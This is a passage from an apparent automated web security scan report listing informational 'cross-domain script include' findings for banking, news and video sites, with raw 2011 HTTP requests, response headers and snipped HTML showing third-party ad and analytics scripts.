Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:38 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: PNCSessionCookie=/pnccorp/PNC/Home/Personal; Expires=Thu, 02 Feb 2012 22:00:38 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=5
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 38359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
<div id="sectionBrand1">
           

                   <script src="https://content.pncmc.com/live/pnc/mastheads/flashMastheads/data/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...

17.179. https://www.pnc.com/webapp/unsec/NCProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/NCProductsAndService.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/unsec/NCProductsAndService.do?siteArea=/pnccorp/PNC/Home/About+PNC HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:06 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9OQ1Byb2R1Y3RzQW5kU2VydmljZS5kbw..
Keep-Alive: timeout=60, max=284
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 37311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
<div id="sectionBrand2">
           

                   <script src="https://content.pncmc.com/live/pnc/mastheads/flashMastheads/data/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...

17.180. https://www.pnc.com/webapp/unsec/Solutions.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Solutions.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/unsec/Solutions.do?siteArea=/pnccorp/PNC/Customer+Service HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Tb2x1dGlvbnMuZG8.
Keep-Alive: timeout=60, max=293
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 18957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</script>
<script type="text/javascript" src="https://kod-rl95-prod.responseondemand.com/tracker/vtc.php?orgid=1263883&ichannelid=MYrCvG1282701"></script>
...[SNIP]...

17.181. https://www.pncvirtualwallet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncvirtualwallet.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.pncvirtualwallet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:23 GMT
Server: Apache
Last-Modified: Wed, 29 Dec 2010 17:03:46 GMT
ETag: "3740c8-443f-8d58e080"
Accept-Ranges: bytes
Content-Length: 17471
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Banking &a
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.pnc.com/webapp/scripts/centerPopWindow.js"></script>
...[SNIP]...

17.182. http://www.portlincolntimes.com.au/news/local/news/general/captive-tuna-spawn-again/2056995.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.portlincolntimes.com.au
Path:   /news/local/news/general/captive-tuna-spawn-again/2056995.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/local/news/general/captive-tuna-spawn-again/2056995.aspx HTTP/1.1
Host: www.portlincolntimes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:17:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s33xtc45t2xgjm55niqm5vjx; path=/; HttpOnly
Set-Cookie: rplUserConfirm=-1; domain=.portlincolntimes.com.au; expires=Tue, 26-Oct-2010 01:17:28 GMT; path=/
Set-Cookie: RPMCookieCheck=yes; domain=.portlincolntimes.com.au; expires=Fri, 04-Feb-2011 01:17:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 88552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1
...[SNIP]...
</script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://whistleout.s3.amazonaws.com/public/css/widget-v3/widget_lifeislocal.css" />

<script type="text/javascript" src="http://whistleout.s3.amazonaws.com/public/script/widget/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js">
</script>
...[SNIP]...

17.183. http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.projo.com
Path:   /opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html HTTP/1.1
Host: www.projo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: now
Cache-Control: no-cache,no-store,private,must-revalidate
Pragma: no-cache
P3P: policyref="http://ads.belointeractive.com/w3c/p3p.xml", CP="NOI DSP CUR ADMa DEVa TAIa OUR IND UNI COM NAV INT"
Keep-Alive: timeout=600
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_xfcdmvtufs=dddbcc5b3660;Version=1;path=/
Content-Length: 75680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://www.projo.com/200
...[SNIP]...
</script>

<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
...[SNIP]...
<li class="blank">
<script src="http://d.yimg.com/ds/badge.js" badgetype="small" showbranding="false">SITE_ID:article guid</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
</script>


<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
<li class="blank">
<script src="http://d.yimg.com/ds/badge.js" badgetype="small" showbranding="false">SITE_ID:article guid</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...

17.184. http://www.retirement.merrilledge.com/IRA/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=bYx6oMVfj9kBcCnXRIC7QuWJObofc+Jaq1A5qqoNbP0HE17ytE7Cx6dx0Vbp+Q/E4cPLbF/R9fXTivraTbY10kYDMjDKAxqQRqieQ3mRWgd2QAy2Nyutp7h3RsSMRpGoNb7B4AMxcb4mjelZGvPbqRcR5jGg43CsqRiqk18bI142IGn7nOxKkbOigS1lSoeHsoGaDP9pQTGT5HUtMuiOkt9S5BP4o+t3WUZsSIFeoBg9qKr8E2yq31e2xZVOVmCr9ZS17eAH1TH3qjerMtqmLqHOZH41tqHJZx+Hq1fpVIOXyYbhvoo/Lp9isRNY2sWPpisgLr18HAg3XN9sDFyPAOQ//piYBQLzGAyi1vKQGdsV5+R/lUCvf/q8L6l7W9bnrWRRa9AWjB2+tWtePdOU7eeQpBO/4AcZ/BPW3/7SC9Hz+gHejvNiOsyC6XZQu5pZ/jH7Wm3fQd4+XTCa7boPBGXKXHSNFdtZLNQl1ayww21G2zokvCUEM5aE0VB/wk9zbEUeYA2eFXBYaLJ5DtrW4BUNtwvskBAFPrrqc//mU/6S950OeuWSXE6D82+AeUSOiMVuRyuVEsdx75ZV4zf5G6KdlZxf+ne5+yzcTKPPGFXKjEsnshCBE3NPmGygmWqO; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=bb8b1b67ca344027b65d9c9f791d0fa5; domain=.merrilledge.com; path=/
Set-Cookie: BrowserCheckDone=true; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

17.185. http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rthk.org.hk
Path:   /rthk/news/englishnews/20110126/news_20110126_56_729958.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /rthk/news/englishnews/20110126/news_20110126_56_729958.htm HTTP/1.1
Host: www.rthk.org.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: RTHK Web Server
Date: Thu, 03 Feb 2011 01:17:29 GMT
Content-Type: text/html
X-Cache: MISS from none
Via: 1.0 none:80 (squid/2.6.STABLE7)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title> Ocean Park 'putting species at risk' </
...[SNIP]...
<!-- START OF SmartSource Data Collector TAG -->
<script src="http://rthk.hk/include2010/stat/webtrends.js" type="text/javascript"></script>
...[SNIP]...

17.186. http://www.smh.com.au/environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smh.com.au
Path:   /environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html HTTP/1.1
Host: www.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 03 Feb 2011 01:17:31 GMT
Pragma: no-cache
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Thu, 03 Feb 2011 01:17:32 GMT
Date: Thu, 03 Feb 2011 01:17:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
uses the parameter values assigned above to populate an array of
ad objects. Once that array has been populated, the JavaScript will call the google_ad_request_done function to display
the ads. -->
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2009 Nielsen Online -->
<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js"></script>
...[SNIP]...
<!-- ED-7524 Add Nielsen code across all sites -->
<script type="text/javascript" src="//secure-au.imrworldwide.com/survey/survey-launch.js?rj0054-other"></script>
...[SNIP]...

17.187. http://www.theaustralian.com.au/business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theaustralian.com.au
Path:   /business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502 HTTP/1.1
Host: www.theaustralian.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 61160
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:22:33 GMT
Date: Thu, 03 Feb 2011 01:17:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
<!-- Page includes [1225712686712:null] last generated at Thu Feb 03 12:17:32 EST 2011 -->
               <script type="text/javascript" src="http://resources1.news.com.au/cs/js/tanto-min.js"></script>
               <script type="text/javascript" src="http://resources1.news.com.au/cs/js/network-3rdpartylibs-min.js"></script>
               <script type="text/javascript" src="http://resources1.news.com.au/cs/js/base-modules-min.js"></script>
               <script type="text/javascript" src="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js"></script>
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css" />
               <script type="text/javascript" src="http://resources.news.com.au/cs/js/site-australianbusiness-min.js"></script>
               <script type="text/javascript" src="http://djcs.theaustralian.news.com.au/custom/theaustralian-com-au/js-company-mouseover.asp"></script>
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://media.theaustralian.com.au/fe/2011/02-feb/nabila-ahmed-dinkus.css" />
       <script type="text/javascript" src="http://sops.news.com.au/adkit/js/kit.js"></script>
...[SNIP]...
<div class="module-content">
       <script type="text/javascript" src="http://djcs.theaustralian.news.com.au/custom/theaustralian-com-au/jsinc-marketbanner.asp?enableLQ=1"></script>
...[SNIP]...
<div class="module-content">
       <script src="http://djcs.theaustralian.news.com.au/custom/theaustralian-com-au/jsinc-searchquote.asp?djSearchDisplayMode=full" type="text/javascript"></script>
...[SNIP]...
<div class="module-content">
       <script type="text/javascript" src="http://djcs.theaustralian.news.com.au/custom/theaustralian-com-au/jsinc-mod-latestquotes.asp"></script>
...[SNIP]...

17.188. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news_detail.asp?we_cat=4&art_id=107529&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 59076
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=KECBPJKADJGPCICDBADCHBPA; path=/
Cache-control: private


<html>

<HTML>


<HEAD>

<title>Aqua City deaths make splash - The Standard</title>
<meta NAME="keywords" CONTENT="Aqua,City,deaths,make,splash,The Standard">
<meta NAME="description" CON
...[SNIP]...
</script-->
<script language="Javascript" src="http://www.hkheadline.com/js/headline_top_date_weather.js?d=20112391733"></script>
...[SNIP]...
</script>
                                   <script type="text/javascript"
                                   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                   </script>
...[SNIP]...
<!-- END Nielsen//NetRatings SiteCensus V5.1 -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.189. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news_detail.asp?we_cat=4&art_id=107529&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:56:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 59076
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=DHADPJKABEKJMENGIGAPIBKB; path=/
Cache-control: private


<html>

<HTML>


<HEAD>

<title>Aqua City deaths make splash - The Standard</title>
<meta NAME="keywords" CONTENT="Aqua,City,deaths,make,splash,The Standard">
<meta NAME="description" CON
...[SNIP]...
</script-->
<script language="Javascript" src="http://www.hkheadline.com/js/headline_top_date_weather.js?d=20112395657"></script>
...[SNIP]...
</script>
                                   <script type="text/javascript"
                                   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                   </script>
...[SNIP]...
<!-- END Nielsen//NetRatings SiteCensus V5.1 -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.190. http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upi.com
Path:   /Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/ HTTP/1.1
Host: www.upi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:32 GMT
Server: Apache/2.2.15 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=h5pmndrdvp301roj3gb031t642; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 66058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Blue fin tuna
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<li style="padding-right:20px;"><script type="text/javascript"
                       src="http://d.yimg.com/ds/badge2.js"
                       badgetype="small-votes">

                       ARTICLEURL
                   </script>
...[SNIP]...

17.191. http://www.ustrust.com/ust/pages/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ustrust.com
Path:   /ust/pages/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ust/pages/index.aspx HTTP/1.1
Host: www.ustrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TM_PUID=958311fb-b895-4038-88f5-33108f266ab7; domain=.TotalMerrill.com; expires=Tue, 02-Feb-2021 22:20:42 GMT; path=/
Date: Wed, 02 Feb 2011 22:20:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<!-- Begin Core Metrics -->
                           <script language="javascript1.1" type="text/javascript" src="http://www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
                           <script language="javascript1.1" type="text/javascript" src="http://www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

17.192. http://www.wcti12.com/news/26551757/detail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcti12.com
Path:   /news/26551757/detail.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/26551757/detail.html HTTP/1.1
Host: www.wcti12.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 45691
Content-Type: text/html
Set-Cookie: alpha=35ce8f186d5f00002e024a4d32200c00e6bc0100; expires=Sun, 31-Jan-2021 01:17:34 GMT; path=/; domain=.wcti12.com
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin131
X-Flow: xslt-in-production
Cache-Control: max-age=596
Expires: Thu, 03 Feb 2011 01:27:30 GMT
Date: Thu, 03 Feb 2011 01:17:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="no-js">
<head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Most Popular Stories RSS" href="/mostpopularstories/topstory.rss"><script type="text/javascript" src="http://nexus.ensighten.com/IB/Bootstrap.js"></script>
...[SNIP]...
<div class="sectionwidget1">


<script type="text/javascript" language="JavaScript" src="http://images.ibsys.com/sh/scripts/generateObject.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

17.193. http://www.webveteran.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webveteran.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.webveteran.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=8283151;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/
Set-Cookie: CFTOKEN=bf0ce741d922432b-17A7490E-5056-A306-AF9E960E65180C8B;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/
Set-Cookie: SKIP=1;expires=Wed, 09-Feb-2011 23:45:08 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.194. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:57:08 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=NrtrQC7BPZk; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:57:08 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:57:08 GMT
Set-Cookie: GEO=8869679663f7590f0e7aff2c65293bd6cwsAAAAzR0KtwdbzTUoLdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhPazY1M0ota0VRSV9OMWxaYjdpV29lWE5keDB0VjJiWW53S1cxbmlleXZR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...

17.195. http://www.youtube.com/  previous  next

Summary

